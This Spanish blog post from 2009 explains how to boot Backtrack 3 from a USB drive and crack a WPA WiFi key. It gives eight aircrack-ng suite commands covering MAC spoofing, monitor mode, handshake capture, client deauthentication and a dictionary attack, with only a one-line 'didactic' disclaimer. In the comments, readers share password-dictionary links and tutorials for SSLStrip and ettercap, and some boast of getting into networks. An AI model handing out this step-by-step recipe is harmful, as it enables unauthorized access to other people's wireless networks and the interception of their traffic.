Obtener la clave WiFi con cifrados WPA gracias a Backtrack 3

12 de mayo de 2009
Nacho Alonso
reacciones
Obtener la clave WiFi con cifrados WPA gracias a Backtrack 3

Backtrack es una de las muchas distribuciones basadas en Linux, para lo que se conoce como auditorias, en las que básicamente se pueden obtener las claves de las redes Wifi con cifrados como WEP, WPA y otros. El más fácil de conseguir es el primero (lo digo por experiencia propia) aunque el segundo (y otros) también son factibles a la hora del crackeo.

Tenéis toda la información sobre esta distribución en Remote-Exploit. Ahora mismo la versión estable que hay es la #3 aunque ya hay otra beta de la #4. Para hacer más fácil el uso de ésta herramienta podéis descargarlo/instalarlo en un simple pincho (Pendrive) de la siguiente forma:

Necesitaremos el Backtrack 3 versión USB: que descargaremos desde aquí.
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raíz del pendrive (usb flash memory). Por ejemplo e:
En Windows vamos al menu de inicio > ejecutar > cmd
Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos Enter.
Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter. Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al Enter).
Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar Windows.

Aunque también puedes lanzarlo desde un cd-live que grabes, a mi me parece más cómoda la opción del pendrive y más fácil de llevar.

Y para la obtención de la clave, pues podemos fijarnos en uno de los cientos y cientos de vídeos que hay por la red. Pero mejor hacerlo en uno, que sabemos que está bien explicado y que funciona, por ejemplo este:

Los pasos que sigue son estos:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)

Por favor, ten en cuenta que toda la información de este artículo es únicamente didáctica. No la utilices para dañar o molestar a alguien, utilízala con ética y bajo tu responsabilidad.

26 comentarios

  1. dIVTEC
    12 de mayo de 2009

    QUE ONDA GENTE dando la búsqueda me encontré con esto post y me di cuenta que al igual que yo muchos preguntan por los diccionarios bueno yo encontre unos sigue el link: (si alguien me ayudo yo los ayudo “espero”)

    http://www.chilecomparte.cl/index.php?showtopic=576953

    suerte

  2. leo
    12 de mayo de 2009

    donde coloco los diccionarios, ya libere las claves wep y son muy faciles de liberar, ahora quiero probar la vulnerabilidad de mi clave wpa 2 como hago con los diccionarios? alguien sabe donde ponerlos?

  3. 12 de mayo de 2009

    Buen dia

    por acá les dejo los enlaces a un video tutorial en español de Backtrack 4
    muestra paso a paso como hacer auditoria de seguridad a redes inalambricas por medio del hacking
    muy importante porque asi se pueden conocer a fondo los metodos de intrusión a nuestra red o equipos.

    Backtrack 4 R1 tutorial hack Paso a paso, XHydra, SSLStrip, ettercap, driftnet-PARTE-1-
    Backtrack 4 R1 tutorial hack Paso a paso, XHydra, SSLStrip, ettercap, driftnet-PARTE-2-
    Backtrack 4 R1 tutorial hack Paso a paso, XHydra, SSLStrip, ettercap, driftnet-PARTE-3-
    Backtrack 4 R1 tutorial hack Paso a paso, XHydra, SSLStrip, ettercap, driftnet-PARTE-4-
    Backtrack 4 R1 tutorial hack Paso a paso, XHydra, SSLStrip, ettercap, driftnet-PARTE-5-

    espero les sirva de mucho

    Xyn Consultores Tecnológicos
    Isla de Margarita – Venezuela

  4. boris
    12 de mayo de 2009

    recordarle que el backtrack3 las clave wpa solo la da teniendo tarjeta wifi0 marca rtl 8187, athero, con tarjeta wifi0 iwl3945 no soporta los paquetes

  5. chico malo
    12 de mayo de 2009

    yo logre sacar las claves de la red no es tan complicado solo tiene 5 pasos

Posts relacionados